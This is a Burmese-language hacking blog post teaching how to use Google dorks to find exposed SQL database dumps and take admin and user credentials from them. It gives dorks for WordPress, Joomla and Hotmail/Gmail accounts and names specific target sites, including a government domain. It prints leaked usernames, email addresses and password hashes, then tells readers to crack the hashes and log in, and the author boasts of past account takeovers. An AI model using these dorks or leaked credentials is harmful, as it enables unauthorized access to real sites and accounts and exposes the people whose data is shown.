Dork ေတြကိုသုံးျပီး Accounts ေတြ Website ေတြကို ဘယ္လုိ ပာက္ၾကမလဲ..
ဆုိတာေလးေပ့ါ... အားလုံးဘဲ စိတ္၀င္စားလိမ့္မယ္လုိ ့ကြ်န္ေတာ္ ေမွ်ာ္လင့္ပါတယ္..
Hacking ပုိင္းကို ေလ့လာလုိ ့ နည္းနည္းေလး ၀ါေလးရလာပီဆုိ ရင္
အမ်ားစုက Dork ဆုိ တာၾကီးကို ခေလး အထာ (ခေလး အကြက္ေတြလု ိ့ ထင္ထားၾကပါ).. တကယ္တန္းေတာ့
အားလုံးက သူ ့ေနရာနဲ ့သူပါ..
Dorking ပုိင္း စိတ္၀င္စားလုိ ့စေလ့လာမယ္ဆုိရင္ေတာ့ လုိအပ္တာေလးကေတာ့...
[+] 1. ေတြးေတာ တတ္တဲ့ ဦးေႏွာက္ရွိရမယ္..
[+] 2. ျဖတ္ထုိးဥာဏ္ ေကာင္းရမယ္..
[+] 3. Hacking နဲ ့ပတ္သက္ျပီး အေတြ ့အၾကံဳ ရွိရပါမယ္...
ဒီ ၃ ခ်က္သာ သင့္မွာရွိေနရင္ Dork ေတြကို ကုိယ္ပုိင္ ဖန္တီးနုိင္မွာျဖစ္သလုိ...
ခက္ခဲမယ္ ထင္တဲ့ အရာေတြက လြယ္ကူသြားေစတတ္ပါတယ္.. (အျမဲေတာ့မပာုတ္ပါဘူး အမ်ားစု မွာေပ့ါ)
ကဲေကာင္းပီ... ကြ်န္ေတာ္ FB Group ေလးတစ္ခုမွာ ညီကို ေတြကို Hacking ဆုိင္ရာ ဗပာုသုတ ေတြ
ကြ်န္ေတာ္ ေတြ ့ၾကဳံဖူးသမွ် ေတြနဲ ့ကြ်န္ေတာ္ တတ္ထားတဲ့ပညာေလး မေတာက္တစ္ေခါက္ကို ရွဲဖူးပါတယ္.. ဒီအခ်ိန္မွာ
ညီေလးတစ္ေယာက္ ၾကိဳးစားပန္းစားပာက္ေနတဲ့ဆုိဒ္တစ္ခုပါ..သူအတြက္ အေတာ္ေလး ခက္ခဲေပမယ့္ ခုနည္းနဲ
့ကြ်န္ေတာ္အတြက္ ၂ မိနစ္ ေလာက္သာၾကာသြားပါတယ္.. Admin , User:Pass ေတြ အလြယ္တကူရခဲ့ပါတယ္..
ဒါက တစ္ပုိင္းပါ.. ေနာက္တစ္ခါ Account ေတြကို လူတစ္ေယာက္နဲ ့ျပိဳင္ျပီး attack လုပ္ဖူးပါတယ္..
ဒီတုန္းကလည္း ကြ်န္ေတာ္ Dork ကုိသာ သုံးသြားတာပါ... ကြ်န္ေတာ္ သူ ့ထက္ အေကာင့္မ်ားမ်ား attack
လုပ္နုိင္ဖူးပါတယ္... ဒါေတြကလည္း ခုနည္းကိုသုံးခဲ့ဖူးလုိ ့ပါဘဲ..
ကဲ စရေအာင္ဗ်ာ...
ခုနည္းကိုေတာ့ Account & Website Hacking (0day) ေလးတစ္ခုလုိ ့ကြ်န္ေတာ္ ယူဆထားတာေလးပါ..
အရင္ဆုံး ဆုိဒ္ေတြရဲ ့ အက္မင္ User:Pass ေတြကို စလုပ္ၾကတာေပ့ါဗ်ာ..
[+] Dork: ext:sql intext:`wp_users` `user_login`, `user_pass`
ဒီေနရာမွာ ext ဆုိတာက File Extension ဆုိကုိဆုိလုိတာပါ.. အုိေက File Extension ဆုိတာဘာလဲ..
ဥပမာ.. လူအမ်ားသိတဲ့ Dota Game ဖုိင္ဆုိပါေတာ.. ဒါဆုိ သူ ့file extension က exe ပါ..
ဒါမွပာုတ္ NOtepad ဖုိင္ေတြဆုိ သူ file extension က txt ပါ...
Website အမ်ား စုမွာ.. .sql ဆုိတဲ့ File Extension ေနရာပာာလြန္စြာ အေ၇းပါလွပါတယ္..
ဘာလုိ ့လဲဆုိေတာ့ အဲ့ .sql ဆုိတဲ့ ဖုိင္တစ္ခ်ဳိ ့ပာာ ဆုိဒ္တစ္ခုလုံးကို ထိန္းခ်ဳပ္ထားတဲ့ Admin တစ္ေယာက္ရဲ ့ Data
အမ်ားစု သြားေရာက္သုိေလွာင္ထားတဲ့ ေနရာမို ့လုိ ့ပါဘဲ..
Site ရဲ ့ Administrator User Name : Password ေတြက အစေပ့ါဗ်ာ..
ဒါေပမယ့္ခုနည္း ေတြကေတာ့.. Website တစ္ခုရဲ ့ Database(DB) ေတြတည္း၀င္ေရာက္ဖူးတဲ့
သူမ်ားအတြက္ ေတာ့ ပုိအဆင္ေျပနုိင္ပါတယ္...
ကဲ ခုနည္းနည္းေလးစလုိက္ရေအာင္ဗ်ာ..
[+] www.google.com ကုိသြားလုိက္ပါ...
[+] ext:sql intext:`wp_users`
ဆုိတာေလးကို ထည့္လုိက္ပါ... အားပါး... ျမင္လားေတာ့မသိဘူးဗ်
အားပါး ၾကိုက္တဲ့လင့္တစ္ခုကိုနုိပ္လုိက္ပါ..
ဥပမာေပးရရင္...
[+] http://asia-spice.co.uk/india.sql
ကဲ သူငယ္ခ်င္းတုိ ့ျမင္ေတြ ့ရာမွာကေတာ့ ဘာေတြမွန္းမသိဘူးဆုိတဲ့ Code ေတြပါ...
ဒါေပမယ့္.. Ctrl+f နုိပ္ျပီး _users လုိ ့ထည့္ရွာလုိက္ရင္ေတြ ့၇မွာျဖစ္ပါတယ္... ေအာက္ကဥပမာ ၾကည့္တာေပ့ါ...
INSERT INTO `wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`,
`user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES
(1, 'admin', '$P$BubDNW5YEufyKsP7Qs0yzchz8tk4ml.', 'admin', 'prabal@looogobd.com', '', '2011-02-02
14:22:20', '', 0, 'admin');
So.. So... So... "လဲလဲလဲလဲလဲလဲလဲ"
[+] http://www.asia-spice.co.uk
[+] Admin Page : http://www.asia-spice.co.uk/wp-admin
[+] User : admin
[+] Pass : $P$BubDNW5YEufyKsP7Qs0yzchz8tk4ml (MD 5 ေလးေတာ့ျဖည္ေပ့ါဗ်ာ)
ဒါေလးကေတာ့ wordpress ဆုိဒ္ကို လုပ္သြားတာေလးပါ... ...
အုိေက Joomla Website ကိုလည္း လုပ္ၾကည့္ရေအာင္ဗ်ာ.. ေဒါ့ေလး စေရးၾကမယ္..
wordpress ဆုိဒ္ဆုိ wp_users လုိ ့သုံးပါတယ္...
Joomla ဆုိဒ္မွာဆုိရင္ jos_users လုိ ့သုံးပါတယ္.. ဒီေတာ့သင့္ ဦးေႏွာက္ကို အရင္စမ္းသပ္ပါ....
Dork ကုိ သင္ဘယ္လုိ ေရးရမလဲဆုိတာကို... စမ္းသပ္ၾကည့္ပါ.. ျပီးမွ ေအာက္က Dork ကုိၾကည့္ပါ...
[+] Dork : ext:sql intext:`jos_users`
အုိေက ပုံမွန္တုိင္းပါဘဲ.. မိမိ စိတ္ၾကိုက္လင့္တစ္ခုကို ရယူလိုက္ပါ..
ဥပမာေပးရရင္..ေတာ့ ေအာက္ကလင့္ေပ့ါဗ်ာ..
[+] http://www.nape.gov.bd/ssdemo_nape.sql
ဆုိပါေတာ့ Ctrl+f ကုိနုိပ္ျပီး table jos_users လုိ ့ထည့္ရွာလုိက္ပါ..
အားပါးေအာက္ဆုံးနားေလးမွာေတြ ့ေနရပါျပီ...
ျမင္လားေတာ့မသိဘူးဗ် ...
INSERT INTO `jos_users` (`id`, `name`, `username`, `email`, `password`, `usertype`, `block`,
`sendEmail`, `gid`, `registerDate`, `lastvisitDate`, `activation`, `params`) VALUES
(62, 'Administrator', 'admin', 'abc@yahoo.com',
'1c593b301f5b54004f59dec08f966bcb:DDg8EdtaoX2M4ta6zAkkriJcbzBchX5a', 'Super Administrator', 0, 1,
25, '2011-11-30 15:36:33', '2011-12-11 14:37:58', '',
'admin_language=\nlanguage=\neditor=\nhelpsite=\ntimezone=0\n\n'),
(63, 'Shuvo', 'ssshuvo', 'shuvo@yahoo.com',
'82bf62a9f84ca409800aafca388ececd:4Etey3jMyOllDVqggYvAmrG9XLShFoHQ', 'Registered', 0, 0, 18,
'2011-12-01 10:19:55', '2011-12-01 10:39:43', '96b8a810f2b3a2c3fe34c9938f1453ed', '\n');
အေတာင့္လုိက္ေတြ ထြက္လာပါတယ္..
[+] http://www.nape.gov.bd
[+] http://www.nape.gov.bd/administrator/
[+] User : abc@yahoo.com / Pass:
1c593b301f5b54004f59dec08f966bcb:DDg8EdtaoX2M4ta6zAkkriJcbzBchX5a (MD5)
[+] User : shuvo@yahoo.com / Pass:
82bf62a9f84ca409800aafca388ececd:4Etey3jMyOllDVqggYvAmrG9XLShFoHQ (MD5)
ကဲ... ျမင္တဲ့အတုိင္းဘဲဗ်ာ.. ခုျပသြားတာက wordpress / Joomla တုိ ့ဘဲျဖစ္ပါတယ္...
ဒါေလးက လူအမ်ားစုသိေတာ့ ဥပမာ ေပးရတာပိုအဆင္ေျပမယ္ထင္လုိ ့ပါ..
တစ္ျခားဆုိဒ္ေတြကိုလည္း အဲ့လုိ ပါဘဲ... သူငယ္ခ်င္းတုိ ့ကို ကြ်န္ေတာ္ေျပာခဲ့သလိုေပ့ါဗ်ာ...
ဦးေႏွာက္ေပ့ါ အေပၚက အခ်က္သုံးခ်က္ နဲ ့ သာဆုိရင္ မီးပြင့္ထြက္ေအာင္ ပာက္လုိ ့ရပါတယ္...
Web hacking ပုိင္းေလးျပီးျပီ ဆုိေတာ့ Accounts ေတြကို ပာက္ၾကည့္ရေအာင္ဗ်ာ..
Account HackinG with Dorks :P
Hack လုိက္ၾကတာမ်ား တဖြဲဖြဲ ဘဲ ဗ်ာ။ ကြ်န္ေတာ္ကေတာ့ Dork ေလး တစ္ခ်က္ရမ္းျပေပးပ့ါမယ္။
တကယ္တန္းေတာ့ account ေတြ Hack တယ္ ဆုိတာ ပ်င္းဖုိ ့ေကာင္း ပါတယ္။ ဗပာုသုတ အေနနဲ ့
ထပ္ျဖည့္ျပီးေျပာေပးပ့ါမယ္..။ အေကာင့္တစ္ခုကိုHack ဖုိ ့ ရည္ရြယ္ထားတယ္ဆုိပါေတာ့ဗ်ာ။ အရင္
ဆုံး Track လုိက္ၾကည့္မယ္။ ျပီးရင္ သူ ့အေကာင့္နဲ ့ ခ်ိတ္ ဆက္ထားတဲ့လင့္ေတြကို ၾကည့္မယ္။ျပီးေတာ့ အဲ့ဆုိဒ္ကုိ
စမ္းၾကည့္ေပ့ါ ။
အဲ့ဆုိဒ္ပါ ေပါက္သြား၇င္ တစ္ခ်က္ခုတ္ ႏွစ္ခ်က္ပ်က္ဘဲ။ ကဲ အခုနည္းကို စလုိက္အုံးမယ္။
[+] Google Dork : ext:sql intext:@hotmail.com intext:e10adc3949ba59abbe56e057f20f883e
[+] ext:sql intext:"INSERT INTO" intext:@hotmail.com intext:password
(သုိ ့ မပာုတ္)
[+] ext:sql intext:@hotmail.com intext:password
hotamil.com ေနရာမွာ gmail.com ဆုိလည္း အလုပ္လုပ္ေသးတယ္ေနာ္။
အင္းၾကိုက္တဲ့လင့္သာနုိပ္ခ်လိုက္ဗ်ာ. http://reflets.info/hcsr.gov.sy_users.sql ဘဲ
ဆုိၾကပါစုိ ့ဗ်ာ... ျမင္တယ္ေနာ္ အေကာင့္ေတြပလူပ်ံေနတာဘဲ။
username : souheilhanna@baath.shern.net
Password : e10adc3949ba59abbe56e057f20f883e
ပတ္စေပ့ါ က ဒီတုိင္းထည့္လုိ ့မရေသးဘူးေနာ္ hash (md5) ျဖည္ရပါအုံးမယ္.
ကြ်န္ေတာ့ဆုိဒ္(www.minsoeyarsar.blogspot.com) ရဲ ့ label တည္းမွာ md5cracker ဆုိတဲ့
ပာာတည္းမွာၾကိုက္တဲ့လင့္ကိုအသုံးျပဳ ့ျပီး ခရက္နုိင္ပါတယ္.
ျပီးရင္ေတာ့ စမ္း၀င္ၾကည့္ေပ့ါဗ်ာ..
Min Soe Yar Sar……. ဆီမွ ေလ့လာျဖစ္ခဲ့တာပါ
အရာရာအဆင္ေျပျပီး ေကာင္းတဲ့ဘတ္မွာ အသံုးခ်ႏွိုင္ၾကပါေစဗ်ာ
0 comments:
Post a Comment